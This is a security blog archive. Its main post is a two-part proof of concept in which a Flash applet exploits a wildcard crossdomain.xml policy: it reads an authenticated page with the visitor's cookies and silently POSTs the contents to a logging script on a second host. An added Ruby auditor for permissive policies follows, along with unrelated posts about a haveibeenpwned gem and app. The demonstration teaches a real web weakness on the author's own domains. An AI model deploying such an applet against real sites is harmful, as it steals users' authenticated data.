Liberal Crossdomain.xml Example - Part 2

As a followup to Liberal Crossdomain.xml Exploit Example – Part 1, this is the source for the Flash app.

package {
 import flash.display.Sprite;
 import flash.events.*;
 import flash.net.URLRequestMethod;
 import flash.net.URLRequest;
 import flash.net.URLLoader;
 
 // Sprite is a base class for display objects that don't use the timeline
 public class flasher extends Sprite {
  public function flasher() {
   // Target URL from where the data is to be retrieved
   var readFrom:String = "http://rubysecurity.info/login/info.php";
   var readRequest:URLRequest = new URLRequest(readFrom);
   var getLoader:URLLoader = new URLLoader();
   // eventHandler runs once the whole response has been received
   getLoader.addEventListener(Event.COMPLETE, eventHandler);
   try 
   {
    getLoader.load(readRequest);
   } 
   catch (error:Error) 
   {
    // Errors are deliberately ignored; nothing is shown to the user
   }
  }
 
  private function eventHandler(event:Event):void 
  { 
   // URL to which retrieved data is to be sent
   var sendTo:String = "http://injectionvector.com/flasher/log.php";
   var sendRequest:URLRequest = new URLRequest(sendTo);
   sendRequest.method = URLRequestMethod.POST;
   // The POST body is the response received by the first request
   sendRequest.data = event.target.data;
   var sendLoader:URLLoader = new URLLoader();
   try 
   {
    sendLoader.load(sendRequest);
   } 
   catch (error:Error) 
   {
    // Errors are deliberately ignored here as well
   }
  }
 }
}

It’s really a fairly simple Flash applet. The class is called flasher and extends Sprite, a base class for display objects that don’t use the timeline. In the constructor it creates a URLRequest object to read data from the location specified in the readFrom variable via a URLLoader object, and it registers an event handler, called eventHandler, that is called when that read is done. When the read completes, eventHandler basically does the same thing in the other direction: it POSTs to the URL specified in sendTo and sets the body of the request to the data received in the first step.

Note: This is based off an example that I found, but have misplaced. Once found, I will update the post to reference it.


Liberal Crossdomain.xml Exploit Example – Part 1

So, I decided to whip up this PoC of a liberal crossdomain.xml policy and what you can do with it. It’s been on my mind recently and I thought a tangible example would help solidify in my mind some of the possibilities. First, the basics-

What is a crossdomain.xml file?

A crossdomain.xml file essentially lets a site specify which domains flash applets may be loaded from and still be allowed to access it. The domain(s) listed in crossdomain.xml refer to the domain the applet is loaded from, not the domain of the page that references the flash file.

Why does this matter?

Keep in mind that when a flash applet makes a call to retrieve data from a domain, the browser includes any cookies for that domain with the call. So, if it’s a domain that you’re authenticated with, then the flash applet will have the same access to that domain as the user does when accessing the site.

A working example

There are 2 domains for this example- rubysecurity.info and injectionvector.com. These are both domains that I own and have used for this demo.

Try going to http://rubysecurity.info/login/info.php. You will get a message that looks like this-

You are not logged in. Please login

because you are not logged in. That page requires you to be authenticated to view it. (In this case “authenticated” means a cookie is set with your username:password in it.)

Then go to http://rubysecurity.info/login and input anything as the user name and anything as the password. In my example, I used “chs” for both. You will be redirected to http://rubysecurity.info/login/info.php with a message that looks like-

Thanks for logging in! Your credentials are: chs:chs. Do not share them with others. You must be authenticated to view this page.

Since you are authenticated, it lets you get to that page and shows you your username:password in this example. In a real world site it could be a page that shows you bank balances, sensitive data, etc.

Now, in another browser tab open http://injectionvector.com/flasher. It appears that nothing happens. But, in the background it connected to http://rubysecurity.info/login/info.php, got the response, and logged it.

You can see the results at http://injectionvector.com/flasher/readlog.php

Currently it looks like-

Thanks for logging in! Your credentials are: chs:chs. Do not share them with others. You must be authenticated to view this page.

So, the flash applet that I wrote on http://injectionvector.com/flasher connected to http://rubysecurity.info/login/info.php and pulled the content utilizing your existing session with rubysecurity.info.

Why did that happen?

This happened because rubysecurity.info had a liberal crossdomain.xml policy. In this example it lets any flash applet connect. It looks like-

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

When a flash applet tries to connect to a domain, the Flash player first retrieves that domain’s crossdomain.xml and applies the policy it contains. Since the policy above allows access from any domain, the flash applet from injectionvector.com was allowed to connect, access the page, and log the results.
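As an added example (not part of the original post), here is the check a site owner can run against a crossdomain.xml to catch the permissive settings described above, which are exactly what the applet in Part 2 relies on. It uses REXML from the Ruby standard library; the two policies are constructed samples, the first copying the wildcard policy quoted in the post and the second a restrictive alternative, and beyond the wildcard it also flags wildcard subdomains, secure="false" and wildcard allow-http-request-headers-from entries.

```ruby
require 'rexml/document'

# Constructed sample: the wildcard policy quoted in the post.
LIBERAL_POLICY = <<~XML
  <?xml version="1.0"?>
  <cross-domain-policy>
    <allow-access-from domain="*"/>
  </cross-domain-policy>
XML

# Constructed sample: trust one named origin only, and refuse any other
# policy file on the site (permitted-cross-domain-policies="master-only").
RESTRICTIVE_POLICY = <<~XML
  <?xml version="1.0"?>
  <cross-domain-policy>
    <site-control permitted-cross-domain-policies="master-only"/>
    <allow-access-from domain="static.example.com" secure="true"/>
  </cross-domain-policy>
XML

# Returns an array of findings; an empty array means no risky setting was seen.
def audit_crossdomain(xml)
  doc = REXML::Document.new(xml)
  findings = []

  REXML::XPath.each(doc, '//allow-access-from') do |el|
    domain = el.attributes['domain'].to_s
    if domain == '*'
      findings << %q(allow-access-from domain="*": any flash applet may read responses sent with the user's cookies)
    elsif domain.start_with?('*.')
      findings << "allow-access-from domain=\"#{domain}\": every subdomain is trusted"
    end
    if el.attributes['secure'] == 'false'
      findings << "allow-access-from domain=\"#{domain}\" secure=\"false\": plain-HTTP applets may read HTTPS content"
    end
  end

  REXML::XPath.each(doc, '//allow-http-request-headers-from') do |el|
    findings << 'allow-http-request-headers-from domain="*": any applet may send custom headers' if el.attributes['domain'] == '*'
  end

  REXML::XPath.each(doc, '//site-control') do |el|
    findings << 'site-control permitted-cross-domain-policies="all": policy files anywhere on the site are honoured' if el.attributes['permitted-cross-domain-policies'] == 'all'
  end

  findings
end
```

Run it over the policy file fetched from your own site; anything other than an empty result deserves a look.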

More to come…


New version of iPwnedCheck is in the App Store! Adds breach details and other enhancements

Version 1.3 has been released and is in the App Store.

Enhancements:

  • Click on a breach name to get more details
  • Internationalized date formatting
  • Removes autocapitalization/autocorrection when adding sites
  • Checks for duplicate usernames/emails already tracked

Get it at-

https://itunes.apple.com/us/app/ipwnedcheck/id826895005


iPwnedCheck is in the App Store! It’s an #ios app that queries @haveibeenpwned by @troyhunt

I’m excited to announce that iPwnedCheck is now in the iOS App Store! It’s an iOS app that uses the API to query multiple usernames/email addresses against http://haveibeenpwned.com.

Get it here-

https://itunes.apple.com/us/app/ipwnedcheck/id826895005?ls=1&mt=8

Please let me know if you have any comments/questions/complaints!


Unauthorized Access

Dear Friend from 175.126.111.48,

Please stop trying to log in to this site.

Thanks,

Management


PwnedCheck updated to also check for Snapchat

PwnedCheck is a ruby gem that I wrote that checks an email address, phone number, or username against the new site by Troy Hunt called haveibeenpwned.com. His site aggregates data from breaches and allows you to check to see if your data has been compromised. Use it as follows-

Installation

gem install PwnedCheck

Usage:

require 'pwnedcheck'
 
# The 4 cases.
# foo@bar.com is a valid address on the site
# foo232323ce23ewd@bar.com is a valid address, but not on the site
# foo.bar.com is an invalid format
# mralexgray is a user id in snapchat
list = ['foo@bar.com', 'foo232323ce23ewd@bar.com', 'foo.bar.com', 'mralexgray']
 
list.each do |item|
  begin
    sites = PwnedCheck::check(item)
    if sites.length == 0
      puts "#{item} --> Not found on http://haveibeenpwned.com"
    else
      sites.each do |site|
        puts "#{item} --> #{site}"
      end
    end
  rescue PwnedCheck::InvalidEmail => e
    puts "#{item} --> #{e.message}"
  end
end

Output:

foo@bar.com --> Adobe
foo@bar.com --> Gawker
foo@bar.com --> Stratfor
foo232323ce23ewd@bar.com --> Not found on http://haveibeenpwned.com
foo.bar.com --> Not found on http://haveibeenpwned.com
mralexgray --> Snapchat

The code is available at http://github.com/sampsonc/PwnedCheck and the gem page is http://rubygems.org/gems/PwnedCheck.


PwnedCheck passed 1000 downloads!

I’m so excited. My first experiment with creating and publishing a ruby gem seems to have been successful! As of this post it’s been downloaded 1069 times in the past 4 days. PwnedCheck is a ruby gem that I wrote that checks an email address against the new site by Troy Hunt called haveibeenpwned.com. His site aggregates password dumps from breaches and allows you to check to see if your password has been compromised. Use it as follows-

Installation

gem install PwnedCheck

Usage:

require 'pwnedcheck'
 
# The 3 cases.
# foo@bar.com is a valid address on the site
# foo232323ce23ewd@bar.com is a valid address, but not on the site
# foo.bar.com is an invalid format
addresses = ['foo@bar.com', 'foo232323ce23ewd@bar.com', 'foo.bar.com']
 
addresses.each do |address|
  begin
    sites = PwnedCheck::check(address)
    if sites.length == 0
      puts "#{address} --> Not found on http://haveibeenpwned.com"
    else
      sites.each do |site|
        puts "#{address} --> #{site}"
      end
    end
  rescue PwnedCheck::InvalidEmail => e
    puts "#{address} --> #{e.message}"
  end
end

The code is available at http://github.com/sampsonc/PwnedCheck and the gem page is http://rubygems.org/gems/PwnedCheck.


New ruby gem to access @haveibeenpwned.

So, I decided to figure out how to create a ruby gem and decided to start with a simple gem that checks an email address against http://haveibeenpwned.com.

Installation

gem install PwnedCheck

Usage:

require 'pwnedcheck'
 
# The 3 cases.
# foo@bar.com is a valid address on the site
# foo232323ce23ewd@bar.com is a valid address, but not on the site
# foo.bar.com is an invalid format
addresses = ['foo@bar.com', 'foo232323ce23ewd@bar.com', 'foo.bar.com']
 
addresses.each do |address|
  begin
    sites = PwnedCheck::check(address)
    if sites.length == 0
      puts "#{address} --> Not found on http://haveibeenpwned.com"
    else
      sites.each do |site|
        puts "#{address} --> #{site}"
      end
    end
  rescue PwnedCheck::InvalidEmail => e
    puts "#{address} --> #{e.message}"
  end
end

The code is available at http://github.com/sampsonc/PwnedCheck and the gem page is http://rubygems.org/gems/PwnedCheck.

Let me know what you think!


Testing #WordPress cache plugins. What’s the best?

So far I have tried-

  • W3 Total Cache
  • WP Super Cache
  • Hyper Cache

#ruby code to access the @haveibeenpwned api.

This is just some ruby I whipped up really quickly to access the API of haveibeenpwned.com, which is a cool new site by Troy Hunt that aggregates password dump information from breaches and allows you to search for your email address.

I think the code is pretty self-explanatory, but comment or send me a line if you have questions/suggestions/criticism/etc!

require 'mechanize'
require 'addressable/uri'
 
agent = Mechanize.new
 
# One account (email address) per line in addresses.txt
File.open('addresses.txt').each do |line|
  line = line.chomp
  begin
    target = "http://haveibeenpwned.com/api/breachedaccount/#{line}"
    page = agent.get Addressable::URI.parse(target)
  rescue Mechanize::ResponseCodeError => e
    # Non-2xx responses raise; map the status code to a short message
    case e.response_code
    when '404'
      puts "#{line} => Not Found"
    when '400'
      puts "#{line} => Bad Request"
    else
      puts "#{line} => #{e.message}"
    end
  else
    # Success: print the raw API response for this account
    puts "#{line} => #{page.content}"
  end
end